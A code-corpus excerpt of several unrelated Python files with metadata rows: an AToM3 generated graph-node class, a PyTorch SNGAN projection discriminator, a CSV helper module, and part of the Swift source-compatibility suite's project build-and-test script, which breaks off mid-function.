Automatically generated AToM3 syntactic object (DO NOT MODIFY DIRECTLY)
Author: gehan
Modified: Sun Feb 15 10:22:14 2015
________________________________________________________________________________
"""
from ASGNode import *
from ATOM3Type import *
from ATOM3Text import *
from ATOM3String import *
from ATOM3Boolean import *
from graph_MT_pre__TransitionType import *
class MT_pre__TransitionType(ASGNode, ATOM3Type):
def __init__(self, parent = None):
ASGNode.__init__(self)
ATOM3Type.__init__(self)
self.superTypes = ['MT_pre__MetaModelElement_S']
self.graphClass_ = graph_MT_pre__TransitionType
self.isGraphObjectVisual = True
if(hasattr(self, '_setHierarchicalLink')):
self._setHierarchicalLink(False)
if(hasattr(self, '_setHierarchicalNode')):
self._setHierarchicalNode(False)
self.parent = parent
self.MT_pre__cardinality=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_pre__classtype=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_pre__name=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_label__=ATOM3String('', 20)
self.MT_pivotOut__=ATOM3String('', 20)
self.MT_pivotIn__=ATOM3String('', 20)
self.MT_subtypeMatching__=ATOM3Boolean()
self.MT_subtypeMatching__.setValue(('True', 0))
self.MT_subtypeMatching__.config = 0
self.generatedAttributes = {'MT_pre__cardinality': ('ATOM3Text', ),
'MT_pre__classtype': ('ATOM3Text', ),
'MT_pre__name': ('ATOM3Text', ),
'MT_label__': ('ATOM3String', ),
'MT_pivotOut__': ('ATOM3String', ),
'MT_pivotIn__': ('ATOM3String', ),
'MT_subtypeMatching__': ('ATOM3Boolean', ) }
self.realOrder = ['MT_pre__cardinality','MT_pre__classtype','MT_pre__name','MT_label__','MT_pivotOut__','MT_pivotIn__','MT_subtypeMatching__']
self.directEditing = [0,0,0,1,1,1,1]
def clone(self):
cloneObject = MT_pre__TransitionType( self.parent )
for atr in self.realOrder:
cloneObject.setAttrValue(atr, self.getAttrValue(atr).clone() )
ASGNode.cloneActions(self, cloneObject)
return cloneObject
def copy(self, other):
ATOM3Type.copy(self, other)
for atr in self.realOrder:
self.setAttrValue(atr, other.getAttrValue(atr) )
ASGNode.copy(self, other)
def preCondition (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.preCondition(actionID, params)
else: return None
def postCondition (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.postCondition(actionID, params)
else: return None
def preAction (self, actionID, * params):
if actionID == self.CREATE:
self.autoIncrLabel(params)
if self.graphObject_:
return self.graphObject_.preAction(actionID, params)
else: return None
def postAction (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.postAction(actionID, params)
else: return None
def QOCA(self, params):
"""
QOCA Constraint Template
NOTE: DO NOT select a POST/PRE action trigger
Constraints will be added/removed in a logical manner by other mechanisms.
"""
return # <---- Remove this to use QOCA
""" Get the high level constraint helper and solver """
from Qoca.atom3constraints.OffsetConstraints import OffsetConstraints
oc = OffsetConstraints(self.parent.qocaSolver)
"""
Example constraint, see Kernel/QOCA/atom3constraints/OffsetConstraints.py
For more types of constraints
"""
oc.fixedWidth(self.graphObject_, self.graphObject_.sizeX)
oc.fixedHeight(self.graphObject_, self.graphObject_.sizeY)
def autoIncrLabel(self, params):
#===============================================================================
# Auto increment the label
#===============================================================================
# If there is already one, ignore
if not self.MT_label__.isNone(): return
# Get the maximum label of all MT_pre__ elements
label = 0
for nt in self.parent.ASGroot.listNodes:
if nt.startswith('MT_pre__'):
for node in self.parent.ASGroot.listNodes[nt]:
currLabel = 0
try:
currLabel = int(node.MT_label__.getValue())
except:
pass
if currLabel > label:
label = currLabel
# The label of this instance will be the max label + 1
self.MT_label__.setValue(str(label + 1))
| 52.456693
| 630
| 0.602222
|
68fa096354b62e9c1be14b86dccb08c25edfb8ab
| 4,562
|
py
|
Python
|
models/discriminators.py
|
rystylee/pytorch-SNGAN-projection
|
825f70180d8c3606dec75098d09216b41ea98fe4
|
[
"MIT"
] | null | null | null |
models/discriminators.py
|
rystylee/pytorch-SNGAN-projection
|
825f70180d8c3606dec75098d09216b41ea98fe4
|
[
"MIT"
] | 6
|
2019-11-19T10:12:34.000Z
|
2022-03-12T00:05:37.000Z
|
models/discriminators.py
|
rystylee/pytorch-SNGAN-projection
|
825f70180d8c3606dec75098d09216b41ea98fe4
|
[
"MIT"
] | 1
|
2019-11-19T10:14:33.000Z
|
2019-11-19T10:14:33.000Z
|
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
def downsample(x):
return F.avg_pool2d(x, 2)
class ResBlock(nn.Module):
def __init__(self, in_ch, out_ch, hidden_ch=None, ksize=3, pad=1,
activation=F.relu, downsampling=False):
super(ResBlock, self).__init__()
self.activation = activation
self.downsampling = downsampling
self.learnable_sc = (in_ch != out_ch) or downsampling
hidden_ch = in_ch if hidden_ch is None else hidden_ch
self.conv1 = nn.utils.spectral_norm(nn.Conv2d(in_ch, hidden_ch, kernel_size=ksize, stride=1, padding=pad))
self.conv2 = nn.utils.spectral_norm(nn.Conv2d(hidden_ch, out_ch, kernel_size=ksize, stride=1, padding=pad))
if self.learnable_sc:
self.c_sc = nn.utils.spectral_norm(nn.Conv2d(in_ch, out_ch, kernel_size=1, stride=1, padding=0))
self._initialize()
def _initialize(self):
nn.init.xavier_uniform_(self.conv1.weight.data, gain=math.sqrt(2))
nn.init.xavier_uniform_(self.conv2.weight.data, gain=math.sqrt(2))
if self.learnable_sc:
nn.init.xavier_uniform_(self.c_sc.weight.data, gain=1.)
def forward(self, x):
return self.residual(x) + self.shortcut(x)
def residual(self, x):
h = x
h = self.activation(h)
h = self.conv1(h)
h = self.activation(h)
h = self.conv2(h)
if self.downsampling:
h = downsample(h)
return h
def shortcut(self, x):
if self.learnable_sc:
x = self.c_sc(x)
if self.downsampling:
x = downsample(x)
return x
else:
return x
class OptimizeBlock(nn.Module):
def __init__(self, in_ch, out_ch, ksize=3, pad=1, activation=F.relu):
super(OptimizeBlock, self).__init__()
self.activation = activation
self.conv1 = nn.utils.spectral_norm(nn.Conv2d(in_ch, out_ch, kernel_size=ksize, stride=1, padding=pad))
self.conv2 = nn.utils.spectral_norm(nn.Conv2d(out_ch, out_ch, kernel_size=ksize, stride=1, padding=pad))
self.c_sc = nn.utils.spectral_norm(nn.Conv2d(in_ch, out_ch, kernel_size=1, stride=1, padding=0))
self._initialize()
def _initialize(self):
nn.init.xavier_uniform_(self.conv1.weight.data, gain=math.sqrt(2))
nn.init.xavier_uniform_(self.conv2.weight.data, gain=math.sqrt(2))
nn.init.xavier_uniform_(self.c_sc.weight.data, gain=1.)
def forward(self, x):
return self.residual(x) + self.shortcut(x)
def residual(self, x):
h = x
h = self.conv1(h)
h = self.activation(h)
h = self.conv2(h)
h = downsample(h)
return h
def shortcut(self, x):
h = x
h = downsample(h)
h = self.c_sc(h)
return h
class SNResNetProjectionDiscriminator(nn.Module):
def __init__(self, ch=64, dim_c=3, n_classes=0, activation=F.relu):
super(SNResNetProjectionDiscriminator, self).__init__()
self.activation = activation
self.n_classes = n_classes
self.block1 = OptimizeBlock(dim_c, ch)
self.block2 = ResBlock(ch * 1, ch * 2, activation=activation, downsampling=True)
self.block3 = ResBlock(ch * 2, ch * 4, activation=activation, downsampling=True)
self.block4 = ResBlock(ch * 4, ch * 8, activation=activation, downsampling=True)
self.block5 = ResBlock(ch * 8, ch * 8, activation=activation, downsampling=True)
self.block6 = ResBlock(ch * 8, ch * 16, activation=activation, downsampling=True)
self.block7 = ResBlock(ch * 16, ch * 16, activation=activation, downsampling=False)
self.l8 = nn.utils.spectral_norm(nn.Linear(ch * 16, 1))
if n_classes > 0:
self.l_y = nn.utils.spectral_norm(nn.Embedding(n_classes, ch * 16))
self._initialize()
def _initialize(self):
nn.init.xavier_uniform_(self.l8.weight.data)
if self.n_classes:
nn.init.xavier_uniform_(self.l_y.weight.data)
def forward(self, x, y=None):
h = x
h = self.block1(h)
h = self.block2(h)
h = self.block3(h)
h = self.block4(h)
h = self.block5(h)
h = self.block6(h)
h = self.block7(h)
h = self.activation(h)
h = torch.sum(h, dim=(2, 3))
out = self.l8(h)
if y is not None:
w_y = self.l_y(y)
out += torch.sum(w_y * h, dim=1, keepdim=True)
return out
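# Illustrative usage sketch, not part of the original file: it only shows how the
# projection discriminator above might be exercised. The image size, batch size and
# class count below are assumptions chosen for demonstration.
if __name__ == '__main__':
    netD = SNResNetProjectionDiscriminator(ch=64, dim_c=3, n_classes=10)
    images = torch.randn(4, 3, 128, 128)   # dummy batch of RGB images
    labels = torch.randint(0, 10, (4,))    # class indices used by the projection term
    logits = netD(images, labels)          # unconditional logit plus projection inner product
    print(logits.shape)                    # expected: torch.Size([4, 1])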
| 34.044776 | 115 | 0.6153 |
7ee0bf8792757869d7ce5035bf3c2d01b9544660 | 892 | py | Python | qualifier/utils/fileio.py | aparkon/week_2_challange | 2f2cacf06110aad1f0f0c0b83cdc1790cf162614 | ["Unlicense"] | null | null | null | qualifier/utils/fileio.py | aparkon/week_2_challange | 2f2cacf06110aad1f0f0c0b83cdc1790cf162614 | ["Unlicense"] | null | null | null | qualifier/utils/fileio.py | aparkon/week_2_challange | 2f2cacf06110aad1f0f0c0b83cdc1790cf162614 | ["Unlicense"] | null | null | null |
# -*- coding: utf-8 -*-
"""Helper functions to load and save CSV data.
This contains a helper function for loading and saving CSV files.
"""
import csv
def load_csv(csvpath):
"""Reads the CSV file from path provided.
Args:
csvpath (Path): The csv file path.
Returns:
A list of lists that contains the rows of data from the CSV file.
"""
with open(csvpath, "r") as csvfile:
data = []
csvreader = csv.reader(csvfile, delimiter=",")
# Skip the CSV Header
next(csvreader)
# Read the CSV data
for row in csvreader:
data.append(row)
return data
def save_csv(csvpath, data, header=None):
    """Saves rows of data to the CSV file at the path provided.
    Args:
        csvpath (Path): The csv file path.
        data (list): A list of rows to write to the CSV file.
        header (list, optional): A header row written before the data.
    """
    with open(csvpath, "w", newline="") as csvfile:
        csvwriter = csv.writer(csvfile, delimiter=",")
        if header:
            csvwriter.writerow(header)
        csvwriter.writerows(data)
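# Illustrative usage sketch, not part of the original module: the file names below
# are hypothetical and only show the intended call pattern for the helpers above.
if __name__ == "__main__":
    from pathlib import Path
    rows = load_csv(Path("input_data.csv"))        # list of rows, header skipped
    save_csv(Path("output_data.csv"), rows, header=["column_a", "column_b"])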
| 22.871795 | 73 | 0.605381 |
b4e3768586ab3e76e46cc05549b71eaf87d60c64 | 55,549 | py | Python | project_future.py | owenv/swift-source-compat-suite | b8dd2ff71bdc0b9a70dc0db9cd1b8fbf16ba9e1f | ["Apache-2.0"] | null | null | null | project_future.py | owenv/swift-source-compat-suite | b8dd2ff71bdc0b9a70dc0db9cd1b8fbf16ba9e1f | ["Apache-2.0"] | null | null | null | project_future.py | owenv/swift-source-compat-suite | b8dd2ff71bdc0b9a70dc0db9cd1b8fbf16ba9e1f | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
# ===--- project.py -------------------------------------------------------===
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ===----------------------------------------------------------------------===
"""A library containing common project building functionality."""
import os
import platform
import re
import subprocess
import shutil
import filecmp
import sys
import json
import time
import argparse
import shlex
import common
try:
basestring # Python 2
except NameError:
basestring = str # Python 3
swift_branch = None
def set_swift_branch(branch):
"""Configure the library for a specific branch.
>>> set_swift_branch('master')
"""
global swift_branch
swift_branch = branch
common.set_swift_branch(branch)
class ProjectTarget(object):
"""An abstract project target."""
def get_build_command(self, incremental=False):
"""Return a command that builds the project target."""
raise NotImplementedError
def get_test_command(self, incremental=False):
"""Return a command that tests the project target."""
raise NotImplementedError
def build(self, sandbox_profile, stdout=sys.stdout, stderr=sys.stderr,
incremental=False):
"""Build the project target."""
return common.check_execute(self.get_build_command(incremental=incremental),
sandbox_profile=sandbox_profile,
stdout=stdout, stderr=stdout)
def test(self, sandbox_profile, stdout=sys.stdout, stderr=sys.stderr,
incremental=False):
"""Test the project target."""
return common.check_execute(self.get_test_command(incremental=incremental),
sandbox_profile=sandbox_profile,
stdout=stdout, stderr=stdout)
class XcodeTarget(ProjectTarget):
"""An Xcode workspace scheme."""
def __init__(self, swiftc, project, target, destination, env,
added_xcodebuild_flags, is_workspace, has_scheme,
clean_build):
self._swiftc = swiftc
self._project = project
self._target = target
self._destination = destination
self._env = env
self._added_xcodebuild_flags = added_xcodebuild_flags
self._is_workspace = is_workspace
self._has_scheme = has_scheme
self._clean_build = clean_build
@property
def project_param(self):
if self._is_workspace:
return '-workspace'
return '-project'
@property
def target_param(self):
if self._has_scheme:
return '-scheme'
return '-target'
def get_build_command(self, incremental=False):
project_param = self.project_param
target_param = self.target_param
try:
build_parent_dir = common.check_execute_output([
'git', '-C', os.path.dirname(self._project),
'rev-parse', '--show-toplevel']).rstrip()
except common.ExecuteCommandFailure as error:
build_parent_dir = os.path.dirname(self._project)
build_dir = os.path.join(build_parent_dir, 'build')
build = []
if self._clean_build and not incremental:
build += ['clean']
build += ['build']
dir_override = []
if self._has_scheme:
dir_override += ['-derivedDataPath', build_dir]
        elif 'SYMROOT' not in self._env:
dir_override += ['SYMROOT=' + build_dir]
dir_override += [k + "=" + v for k, v in self._env.items()]
command = (['xcodebuild']
+ build
+ [project_param, self._project,
target_param, self._target,
'-destination', self._destination]
+ dir_override
+ ['CODE_SIGN_IDENTITY=',
'CODE_SIGNING_REQUIRED=NO',
'ENTITLEMENTS_REQUIRED=NO',
'ENABLE_BITCODE=NO',
'INDEX_ENABLE_DATA_STORE=NO',
'GCC_TREAT_WARNINGS_AS_ERRORS=NO',
'SWIFT_TREAT_WARNINGS_AS_ERRORS=NO'])
command += self._added_xcodebuild_flags
if self._destination == 'generic/platform=watchOS':
command += ['ARCHS=armv7k']
return command
def get_test_command(self, incremental=False):
project_param = self.project_param
target_param = self.target_param
test = ['clean', 'test']
if incremental:
test = ['test']
command = (['xcodebuild']
+ test
+ [project_param, self._project,
target_param, self._target,
'-destination', self._destination,
# TODO: stdlib search code
'SWIFT_LIBRARY_PATH=%s' %
get_stdlib_platform_path(
self._swiftc,
self._destination)]
+ ['INDEX_ENABLE_DATA_STORE=NO',
'GCC_TREAT_WARNINGS_AS_ERRORS=NO'])
command += self._added_xcodebuild_flags
return command
def get_stdlib_platform_path(swiftc, destination):
"""Return the corresponding stdlib name for a destination."""
platform_stdlib_path = {
'macOS': 'macosx',
'iOS': 'iphonesimulator',
'tvOS': 'appletvsimulator',
'watchOS': 'watchsimulator',
}
stdlib_dir = None
for platform_key in platform_stdlib_path:
if platform_key in destination:
stdlib_dir = platform_stdlib_path[platform_key]
break
assert stdlib_dir is not None
stdlib_path = os.path.join(os.path.dirname(os.path.dirname(swiftc)),
'lib/swift/' + stdlib_dir)
return stdlib_path
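# Illustrative sketch, not part of the original file: the toolchain path below is
# made up and only shows how a destination string maps to a stdlib directory.
def _example_stdlib_platform_path():
    swiftc = '/toolchains/swift-latest/usr/bin/swiftc'  # hypothetical toolchain layout
    # 'iOS' appears in the destination, so the result is
    # /toolchains/swift-latest/usr/lib/swift/iphonesimulator
    return get_stdlib_platform_path(swiftc, 'platform=iOS Simulator,name=iPhone 8')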
def clean_swift_package(path, swiftc, sandbox_profile,
stdout=sys.stdout, stderr=sys.stderr):
"""Clean a Swift package manager project."""
swift = os.path.join(os.path.dirname(swiftc), 'swift')
if swift_branch == 'swift-3.0-branch':
command = [swift, 'build', '-C', path, '--clean']
else:
command = [swift, 'package', '-C', path, 'clean']
if (swift_branch not in ['swift-3.0-branch',
'swift-3.1-branch']):
command.insert(2, '--disable-sandbox')
return common.check_execute(command, sandbox_profile=sandbox_profile,
stdout=stdout, stderr=stderr)
def build_swift_package(path, swiftc, configuration, sandbox_profile,
stdout=sys.stdout, stderr=sys.stderr,
added_swift_flags=None,
incremental=False):
"""Build a Swift package manager project."""
swift = os.path.join(os.path.dirname(swiftc), 'swift')
if not incremental:
clean_swift_package(path, swiftc, sandbox_profile,
stdout=stdout, stderr=stderr)
env = os.environ
env['DYLD_LIBRARY_PATH'] = get_stdlib_platform_path(swiftc, 'macOS')
env['SWIFT_EXEC'] = swiftc
command = [swift, 'build', '-C', path, '--verbose',
'--configuration', configuration]
if (swift_branch not in ['swift-3.0-branch',
'swift-3.1-branch']):
command.insert(2, '--disable-sandbox')
if added_swift_flags is not None:
for flag in added_swift_flags.split():
command += ["-Xswiftc", flag]
return common.check_execute(command, timeout=3600,
sandbox_profile=sandbox_profile,
stdout=stdout, stderr=stderr,
env=env)
def test_swift_package(path, swiftc, sandbox_profile,
stdout=sys.stdout, stderr=sys.stderr,
added_swift_flags=None,
incremental=False):
"""Test a Swift package manager project."""
swift = os.path.join(os.path.dirname(swiftc), 'swift')
if not incremental:
clean_swift_package(path, swiftc, sandbox_profile)
env = os.environ
env['SWIFT_EXEC'] = swiftc
command = [swift, 'test', '-C', path, '--verbose']
if added_swift_flags is not None:
for flag in added_swift_flags.split():
command += ["-Xswiftc", flag]
if (swift_branch not in ['swift-3.0-branch',
'swift-3.1-branch']):
command.insert(2, '--disable-sandbox')
return common.check_execute(command, timeout=3600,
sandbox_profile=sandbox_profile,
stdout=stdout, stderr=stderr,
env=env)
def checkout(root_path, repo, commit):
"""Checkout an indexed repository."""
path = os.path.join(root_path, repo['path'])
if repo['repository'] == 'Git':
if os.path.exists(path):
return common.git_update(repo['url'], commit, path)
else:
return common.git_clone(repo['url'], path, tree=commit)
raise common.Unreachable('Unsupported repository: %s' %
repo['repository'])
def strip_resource_phases(repo_path, stdout=sys.stdout, stderr=sys.stderr):
"""Strip resource build phases from a given project."""
command = ['perl', '-i', '-00ne',
'print unless /Begin PBXResourcesBuildPhase/']
for root, dirs, files in os.walk(repo_path):
for filename in files:
if filename == 'project.pbxproj':
pbxfile = os.path.join(root, filename)
common.check_execute(command + [pbxfile],
stdout=stdout, stderr=stderr)
def dispatch(root_path, repo, action, swiftc, swift_version,
sandbox_profile_xcodebuild, sandbox_profile_package,
added_swift_flags, added_xcodebuild_flags,
build_config, should_strip_resource_phases=False,
stdout=sys.stdout, stderr=sys.stderr,
incremental=False):
"""Call functions corresponding to actions."""
substitutions = action.copy()
substitutions.update(repo)
if added_swift_flags:
# Support added swift flags specific to the current repository and
# action by passing their fields as keyword arguments to format, e.g.
# so that {path} in '-index-store-path /tmp/index/{path}' is replaced
# with the value of repo's path field.
added_swift_flags = added_swift_flags.format(**substitutions)
if added_xcodebuild_flags:
added_xcodebuild_flags = \
shlex.split(added_xcodebuild_flags.format(**substitutions))
else:
added_xcodebuild_flags = []
if action['action'] == 'BuildSwiftPackage':
if not build_config:
build_config = action['configuration']
return build_swift_package(os.path.join(root_path, repo['path']),
swiftc,
build_config,
sandbox_profile_package,
stdout=stdout, stderr=stderr,
added_swift_flags=added_swift_flags,
incremental=incremental)
elif action['action'] == 'TestSwiftPackage':
return test_swift_package(os.path.join(root_path, repo['path']),
swiftc,
sandbox_profile_package,
stdout=stdout, stderr=stderr,
added_swift_flags=added_swift_flags,
incremental=incremental)
elif re.match(r'^(Build|Test)Xcode(Workspace|Project)(Scheme|Target)$',
action['action']):
match = re.match(
r'^(Build|Test)Xcode(Workspace|Project)(Scheme|Target)$',
action['action']
)
initial_xcodebuild_flags = ['SWIFT_EXEC=%s' % swiftc,
'-IDEPackageSupportDisableManifestSandbox=YES']
if build_config == 'debug':
initial_xcodebuild_flags += ['-configuration', 'Debug']
elif build_config == 'release':
initial_xcodebuild_flags += ['-configuration', 'Release']
elif 'configuration' in action:
initial_xcodebuild_flags += ['-configuration',
action['configuration']]
build_env = {}
if 'environment' in action:
build_env = action['environment']
other_swift_flags = []
if swift_version:
if '.' not in swift_version:
swift_version += '.0'
major, minor = swift_version.split('.', 1)
# Need to use float for minor version parsing
# because it's possible that it would be specified
# as e.g. `4.0.3`
if int(major) == 4 and float(minor) == 2.0:
other_swift_flags += ['-swift-version', swift_version]
initial_xcodebuild_flags += ['SWIFT_VERSION=%s' % swift_version]
else:
other_swift_flags += ['-swift-version', major]
initial_xcodebuild_flags += ['SWIFT_VERSION=%s' % major]
if added_swift_flags:
other_swift_flags.append(added_swift_flags)
if other_swift_flags:
other_swift_flags = ['$(OTHER_SWIFT_FLAGS)'] + other_swift_flags
initial_xcodebuild_flags += ['OTHER_SWIFT_FLAGS=%s' % ' '.join(other_swift_flags)]
is_workspace = match.group(2).lower() == 'workspace'
project_path = os.path.join(root_path, repo['path'],
action[match.group(2).lower()])
has_scheme = match.group(3).lower() == 'scheme'
clean_build = True
if 'clean_build' in action:
clean_build = action['clean_build']
xcode_target = \
XcodeTarget(swiftc,
project_path,
action[match.group(3).lower()],
action['destination'],
build_env,
initial_xcodebuild_flags + added_xcodebuild_flags,
is_workspace,
has_scheme,
clean_build)
if should_strip_resource_phases:
strip_resource_phases(os.path.join(root_path, repo['path']),
stdout=stdout, stderr=stderr)
if match.group(1) == 'Build':
return xcode_target.build(sandbox_profile_xcodebuild,
stdout=stdout, stderr=stderr,
incremental=incremental)
else:
return xcode_target.test(sandbox_profile_xcodebuild,
stdout=stdout, stderr=stderr,
incremental=incremental)
else:
raise common.Unimplemented("Unknown action: %s" % action['action'])
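# Illustrative sketch, not part of the original file: how repository fields are
# substituted into --add-swift-flags before dispatching. The values are made up.
def _example_flag_substitution():
    substitutions = {'path': 'Alamofire', 'action': 'BuildSwiftPackage'}
    # Returns '-index-store-path /tmp/index/Alamofire'
    return '-index-store-path /tmp/index/{path}'.format(**substitutions)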
def is_xfailed(xfail_args, compatible_version, platform, swift_branch, build_config):
"""Return whether the specified swift version/platform/branch/configuration is xfailed."""
if isinstance(xfail_args, dict):
xfail_args = [xfail_args]
def is_or_contains(spec, arg):
return arg in spec if isinstance(spec, list) else spec == arg
def matches(spec):
issue = spec['issue'].split()[0]
current = {
'compatibility': compatible_version,
'branch': swift_branch,
'platform': platform
}
if 'configuration' in spec:
if build_config is None:
raise common.Unreachable("'xfail' entry contains 'configuration' "
"but none supplied via '--build-config' or the containing "
"action's 'configuration' field.")
current['configuration'] = build_config.lower()
        for key, value in current.items():
if key in spec and not is_or_contains(spec[key], value):
return None
return issue
for spec in xfail_args:
issue = matches(spec)
if issue is not None:
return issue
return None
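# Illustrative sketch, not part of the original file: an 'xfail' entry is a dict
# (or list of dicts) with an issue link plus optional compatibility/branch/
# platform/configuration filters. The values below are made up.
def _example_is_xfailed():
    xfail_spec = {'issue': 'https://bugs.swift.org/browse/SR-0000',
                  'branch': ['master'],
                  'platform': 'Darwin'}
    # The spec matches the supplied branch and platform, so the issue is returned.
    return is_xfailed(xfail_spec, '5.0', 'Darwin', 'master', None)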
def str2bool(s):
"""Convert an argument string into a boolean."""
if s.lower() == 'true':
return True
elif s.lower() == 'false':
return False
else:
raise argparse.ArgumentTypeError('true/false boolean value expected.')
def add_arguments(parser):
"""Add common arguments to parser."""
parser.register('type', 'bool', str2bool)
parser.add_argument('--verbose',
action='store_true')
# TODO: remove Linux sandbox hack
if platform.system() == 'Darwin':
parser.add_argument('--swiftc',
metavar='PATH',
help='swiftc executable',
required=True,
type=os.path.abspath)
else:
parser.add_argument('--swiftc',
metavar='PATH',
help='swiftc executable',
required=True)
parser.add_argument('--projects',
metavar='PATH',
required=True,
help='JSON project file',
type=os.path.abspath)
parser.add_argument('--swift-version',
metavar='VERS',
help='Swift version mode (default: None)')
parser.add_argument('--include-repos',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to include a repo '
'(example: \'path == "Alamofire"\')')
parser.add_argument('--exclude-repos',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to exclude a repo '
'(example: \'path == "Alamofire"\')')
parser.add_argument('--include-versions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to include a Swift version '
'(example: '
'\'version == "3.0"\')')
parser.add_argument('--exclude-versions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to exclude a Swift version '
'(example: '
'\'version == "3.0"\')')
parser.add_argument('--include-actions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to include an action '
'(example: '
'\'action == "BuildXcodeWorkspaceScheme"\')')
parser.add_argument('--exclude-actions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to exclude an action '
'(example: '
'\'action == "BuildXcodeWorkspaceScheme"\')')
parser.add_argument('--swift-branch',
metavar='BRANCH',
help='Swift branch configuration to use',
default='master')
parser.add_argument('--sandbox-profile-xcodebuild',
metavar='FILE',
help='sandbox xcodebuild build and test operations '
'with profile',
type=os.path.abspath)
parser.add_argument('--sandbox-profile-package',
metavar='FILE',
help='sandbox package build and test operations with '
'profile',
type=os.path.abspath)
parser.add_argument("--test-incremental",
help='test incremental-mode over multiple commits',
action='store_true')
parser.add_argument("--add-swift-flags",
metavar="FLAGS",
help='add flags to each Swift invocation (note: field '
'names from projects.json enclosed in {} will be '
'replaced with their value)',
default='')
parser.add_argument("--add-xcodebuild-flags",
metavar="FLAGS",
help='add flags to each xcodebuild invocation (note: field '
'names from projects.json enclosed in {} will be '
'replaced with their value)',
default='')
parser.add_argument("--skip-clean",
help='skip all git and build clean steps before '
'building projects',
                        action='store_true')
parser.add_argument("--build-config",
metavar="NAME",
choices=['debug', 'release'],
dest='build_config',
help='specify "debug" or "release" to override '
'the build configuration in the projects.json file')
parser.add_argument("--strip-resource-phases",
help='strip all resource phases from project file '
'before building (default: true)',
metavar='BOOL',
type='bool',
nargs='?',
const=True,
default=True)
parser.add_argument("--project-cache-path",
help='Path of the dir where all the project binaries will be placed',
metavar='PATH',
type=os.path.abspath,
default='project_cache')
def add_minimal_arguments(parser):
"""Add common arguments to parser."""
parser.add_argument('--verbose',
action='store_true')
parser.add_argument('--projects',
metavar='PATH',
required=True,
help='JSON project file',
type=os.path.abspath)
parser.add_argument('--include-repos',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to include a repo '
'(example: \'path == "Alamofire"\')')
parser.add_argument('--exclude-repos',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to exclude a repo '
'(example: \'path == "Alamofire"\')')
parser.add_argument('--include-versions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to include a Swift version '
'(example: '
'\'version == "3.0"\')')
parser.add_argument('--exclude-versions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to exclude a Swift version '
'(example: '
'\'version == "3.0"\')')
parser.add_argument('--include-actions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to include an action '
'(example: '
'\'action == "BuildXcodeWorkspaceScheme"\')')
parser.add_argument('--exclude-actions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to exclude an action '
'(example: '
'\'action == "BuildXcodeWorkspaceScheme"\')')
parser.add_argument('--swift-branch',
metavar='BRANCH',
help='Swift branch configuration to use',
default='master')
def evaluate_predicate(element, predicate):
"""Evaluate predicate in context of index element fields."""
# pylint: disable=I0011,W0122,W0123
for key in element:
if isinstance(element[key], basestring):
exec(key + ' = """' + element[key] + '"""')
return eval(predicate)
def included_element(include_predicates, exclude_predicates, element):
"""Return whether an index element should be included."""
return (not any(evaluate_predicate(element, ep)
for ep in exclude_predicates) and
(include_predicates == [] or
any(evaluate_predicate(element, ip)
for ip in include_predicates)))
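# Illustrative sketch, not part of the original file: include/exclude predicates are
# plain Python expressions evaluated against an element's string fields, mirroring
# the --include-repos/--exclude-repos options. The repo dict below is made up.
def _example_included_element():
    repo = {'path': 'Alamofire', 'branch': 'master'}
    # The include predicate matches and no exclude predicate applies.
    return included_element(['path == "Alamofire"'], [], repo)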
class Factory(object):
@classmethod
def factory(cls, *factoryargs):
def init(*initargs):
return cls(*(factoryargs + initargs))
return init
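# Illustrative sketch, not part of the original file: Factory.factory binds leading
# constructor arguments so the list builders can later create subbuilders with only
# the per-target arguments. The _Pair class below is a made-up example.
def _example_factory():
    class _Pair(Factory):
        def __init__(self, first, second):
            self.first = first
            self.second = second
    make_pair_starting_with_one = _Pair.factory(1)  # binds the first argument
    pair = make_pair_starting_with_one(2)           # supplies the remaining argument
    return (pair.first, pair.second)                # (1, 2)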
def dict_get(dictionary, *args, **kwargs):
"""Return first value in dictionary by iterating through keys"""
for key in args:
try:
return dictionary[key]
except KeyError:
pass
if 'default' in kwargs:
return kwargs['default']
else:
raise KeyError
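# Illustrative sketch, not part of the original file: dict_get returns the value of
# the first key that is present and falls back to 'default' if none is found.
def _example_dict_get():
    action = {'scheme': 'MyScheme'}  # hypothetical action entry
    name = dict_get(action, 'scheme', 'target', default='Swift Package')  # 'MyScheme'
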